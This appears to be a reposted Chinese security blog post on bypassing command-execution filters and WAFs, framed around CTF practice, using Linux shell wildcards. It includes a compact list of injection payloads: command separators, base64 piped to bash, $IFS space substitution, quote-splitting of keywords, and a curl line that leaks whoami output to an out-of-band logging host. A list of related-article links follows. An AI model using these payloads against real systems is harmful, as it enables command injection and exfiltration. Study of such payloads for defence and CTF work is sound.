java执行linux命令_命令执行绕过之Linux通配符

最新推荐文章于 2024-07-09 18:05:47 发布
最新推荐文章于 2024-07-09 18:05:47 发布
阅读量247 收藏
点赞数
文章标签: java执行linux命令 字符串通配符匹配
11869d00f712e6eb280fba62b5dc896c.png

[命令执行,通配符,WAF绕过,linux,CTF]

前几天在微博和公众号上看到一些使用Linux通配符/glob模式来绕过命令执行的方式,感觉很不错,学习总结下。

首先先了解下什么是Linux shell 通配符/glob模式:

概念:

glob 模式(globbing)也被称之为 shell 通配符,名字的起源来自于 Unix V6 中的/etc/glob (详见 man 文档)。glob 是一种特殊的模式匹配,最常见的是通配符拓展,也可以将 glob 模式设为精简了的正则表达式,在最新的 CentOS 7 中已经删除了 glob 的相关描述文档,删除的原因由于 glob 已经整合到了 shell 之中,然后就有了 shell 通配符。shell 通配符 / glob 模式通常用来匹配目录以及文件,而不是文本!!!

语法:

ae8c94e6a6409b91031e0736296abcb3.png

专用字符集

38479fff25ff8795c8b3f378034b74aa.png
3ee0426b1eba03b2e00ecd1a438c875c.png

Linux shell 元字符,在使用通配符时如果没有进行转义可能就会被辨识为元字符

02ca7d16c44fa3eda6d746ad85ad5bc4.png
bd9e4498a27a17be68b931069815dad2.png

其他绕过方式

ls | idls ; id 在shell中,担任"连续指令"功能的符号就是"分号"ls & idls 回车 idls `id` ls ` id` 前面加了一个空格ls `id` 反斜杠 id等价于idls $(id)ls | a=i;b=d;$a$b 拼接ls | echo aWQ=| base64 -d | bash 利用base64`echo "aWQ="|base64 -d`ls | curl xxx.ceye.io/`whoami` 利用dnslog或者http web logcat<1.txtcat$IFS$91.txtcat${IFS}1.txtcat$IFS1.txt%0acat%091.txtw'h'o'am'iw"h"o"am"iwho$@amiecho i$@d|$0w$@h$@o$@a$@m$@i

注意事项

  • 在使用专属字符集的时候,字符集之外还需要用 来包含住,否则专用字符集不会生效,例如 [[:space:]]
  • 想要转义的时候,单引号与双引号使用方法是不同的,单引号会转义所有字符,而且单引号中间不允许再出现单引号,双引号允许出现特定的 shell 元字符,具体字符可以自行查询
  • 在使用花括号 {} 的时候,里面的单个字符串需要使用单引号或者双引号括住,否则就会视为多个的单个字符

Referer:

https://www.cnblogs.com/divent/archive/2016/08/11/5762154.html

https://medium.com/secjuice/waf-evasion-techniques-718026d693d8

作者: 瓦都剋

欢迎来安全脉搏查看更多的干货文章和我们一起交流互动哦!

脉搏地址:安全脉搏 | 分享技术,悦享品质

微博地址:Sina Visitor System

【注:安全脉搏所有文章未经许可,谢绝转载】

weixin_39640767
关注
web安全渗透测试十大常规项(一):web渗透测试之命令执行和代码执行
HACKONE的博客
06-16 79
-RCE代码执行:引用脚本代码解析执行 -RCE命令执行:脚本调用操作系统命令 漏洞函数: 1.PHP: PHP代码执行函数: eval()、assert()、preg_replace()、create_function()、array_map()、call_user_func()、call_user_func_array()、array_filter()、uasort()、等 PHP命令执行函数: system()、exec()、shell_exec()、pcntl_exec()、popen()、proc
java执行Linux通配符不识别,java 实施包含通配符linux命令
weixin_30305029的博客
03-11 242
java 执行包含通配符linux命令package test.runtime;import java.io.BufferedReader;import java.io.IOException;import java.io.InputStreamReader;public class RuntimeTest {/*** @param args*/public static void main(St...
java 执行包含通配符linux命令
iteye_17234的博客
11-17 351
package test.runtime; import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader; public class RuntimeTest { /** * @param args */ public static ...
命令执行(RCE)面对各种过滤,骚姿势绕过总结
最新发布
HUANGXIN9898的博客
07-09 1264
RCE又称远程代码执行漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。
Kali中文社区:java命令执行+waf绕过研究
superadminuser的博客
08-05 1003
Kali中文社区:java命令执行+waf绕过研究原因简单说waf绕过常用命令执行函数最后总结一下 原因 今天在项目中,碰到了waf,本着学习研究的原则,刚好最近在学习java,就顺便研究java命令执行的东西。 简单说waf绕过 网上绕过的方法花里胡哨,这里就简单的说一下本人常用的绕过方法。 参数污染,主要是双写参数,或者对参数进行简单的变形,去除双引号等,主要是为了让waf无需检测这一类参数,或者根据操作系统特性,服务器特性进行绕过,这里感觉越来越难绕了就不多少。 垃圾数据填充,这一招能过的还是
java执行Linux通配符不识别,帮忙看一个linux通配符转译的问题
weixin_42498892的博客
03-11 227
今天nas上硬盘满了,就想删点文件,结果出了点问题,现在连连影响范围我都搞不清楚。贴代码:root@XiaoQiang:/userdisk/data/视频# ll [不]*ls: [不]*: No such file or directoryroot@XiaoQiang:/userdisk/data/视频# ll [不死]*ls: [不死]*: No such file or directoryr...
命令执行绕过技巧
菜鸟-传奇
01-21 2169
命令执行绕过技巧 参考:https://blog.csdn.net/weixin_39190897/article/details/116247765 参考:https://blog.csdn.net/solitudi/article/details/109837640 正则过滤 参考:https://www.runoob.com/php/php-preg_match.html 参考:https...
干货 | 命令执行漏洞和代码执行漏洞详解
weixin_39670937的博客
06-20 896
命令执行(RCE)漏洞和代码执行漏洞区别如下: 代码执行实际上是调用服务器网站代码进行执行命令执行则是调用操作系统命令进行执行 一、命令执行漏洞 1、什么是命令执行 命令执行(Remote Command Execution, RCE) Web应用的脚本代码在执行命令的时候过滤不严 从而注入一段攻击者能够控制的代码,在服务器上以Web服务的后台权限远程执行恶意指令 成因 代码层过滤不严系统的漏洞造成命令注入调用的第三方组件存在代码执行漏洞常见的命令执行函数 PHP:exec、shell_exec、sy
WEB安全(命令执行)记二
weixin_49064458的博客
11-08 307
命令执行漏洞是一种安全漏洞,允许攻击者执行恶意的系统命令。这种漏洞通常发生在应用程序或系统未正确验证用户输入的情况下,导致用户可以通过输入特定的数据来执行系统命令
Linux入门基础
weixin_45042308的博客
06-29 767
用 Makefile 进行规则定义的时候,用户可以定义自己的变量,称为用户自定义变量。makefile 中的变量是没有类型的,直接创建变量然后给其赋值就可以了。1234# 错误, 只创建了变量名, 没有赋值变量名# 正确, 创建一个变量名并且给其赋值变量名=变量值。
4.5. 命令注入
Sumarua的博客
07-02 1103
文章目录4.5. 命令注入4.5.1. 简介4.5.2. 常见危险函数4.5.2.1. PHP4.5.2.2. Python4.5.2.3. Java4.5.3. 常见注入方式4.5.4. 无回显技巧4.5.5. 常见绕过方式4.5.5.1. 空格绕过4.5.5.2. 黑名单绕过4.5.5.3. 长度限制绕过4.5.6. 常用符号4.5.6.1. 命令分隔符4.5.6.2. 通配符4.5.7. 防御 4.5. 命令注入 4.5.1. 简介 命令注入通常因为指Web应用在服务器上拼接系统命令而造成的漏洞。 该
命令执行的一些绕过技巧
m0_55754984的博客
09-14 3652
① 空格过滤 空格可以用以下字符串代替: < 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等 $IFS在linux下表示分隔符,但是如果单纯的cat$IFS2,bash解释器会把整个IFS2当做变量名,所以导致输不出来结果,然而如果加一个{}就固定了变量名,同理在后面加个$可以起到截断的作用 ,但是为什么要用$9呢,因为$9只是当前系统shell进程的第九个参数的持有者,它始终为空字符串。 ② 一些命令分隔符 linux中:%0a
命令执行绕过总结
box
07-23 2262
命令执行绕过总结 Linux命令拼接 a=who b=ami $a$b //输出whoami 常用字符使用 & 表示将任务置于后台执行 ; 多行语句用换行区分代码快,单行语句一般要用到分号来区分代码块 && 只有在 && 左边的命令返回真(命令返回值 $? == 0),&&右边的命令才会被执行。 || 只有在 || 左边的命令返回假(命令返回值 $? == 1),
命令执行绕过姿势
qq_45888826的博客
10-04 683
命令执行绕过姿势
命令执行各种绕过总结
m0_64815693的博客
10-11 9099
最近做了题目很多都有命令执行的,这里给自己做一次总结,也给大家一个参考,有各种绕过,十分的详细哦
【网络安全---Linux命令绕过Linux命令执行绕过技巧(很全,很实用)
m0_67844671的博客
09-24 2853
Linux命令执行绕过方式和思路;网站上可能有一些能执行系统命令的地方,但是对一些关键字和空格等做了一些防护,如何绕过就成了一个难题,这篇文章分享一些Linux下的命令执行绕过技巧以及思路,不如说空格的绕过,关键字绕过,编码绕过等等;
命令执行RCE及其绕过详细总结(各情景下的绕过
2301_76690905的博客
12-12 6256
scandir() :将返回当前目录中的所有文件和目录的列表。返回的结果是一个数组,其中包含当前目录下的所有文件和目录名称(glob()可替换)localeconv() :返回一包含本地数字及货币格式信息的数组。(但是这里数组第一项就是‘.’,这个.的用处很大)current() :返回数组中的单元,默认取第一个值。pos()和current()是同一个东西getcwd() :取得当前工作目录dirname():函数返回路径中的目录部分。
Java执行Linux命令
我的博客
07-30 786
API 把要执行命令作为exec方法的参数,返回一个Process对象代表命令执行的进程。由于执行命令通常要获取输出显示出来,因此对执行命令并获取输出的过程封装为一个工具类: CommandUtil package org.ml.deployer.util; import java.io.IOException; import java.io.InputStream; import ja...
常见命令执行的一些绕过方式
qq_53142368的博客
04-26 6566
文章目录一、命令执行二、绕过技巧1.常见管道符2. 空格过滤3. 黑名单绕过4. 绕过长度限制5. ls命令6. 各种读文件命令 一、命令执行 1. php调用外部程序常用的函数: system()—执行shell命令也就是向dos发送一条指令。 shell_exec() — 通过 shell 环境执行命令,并且将完整的输出以字符串的方式返回。 exec() —执行外部程序。 passthru() — 执行外部程序并且显示原始输出。 2. 造成命令执行的原因 代码过滤不严格–如使用system函数调用封装
Linux命令详解:通配符与系统操作
"这篇资源主要介绍了Linux命令系统的使用,包括各种命令的掌握、命令的语法结构、常用参数的理解,以及一系列具体的命令操作,如显示目录和文件、修改权限、创建和删除目录与文件、切换目录、重命名和移动、复制、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值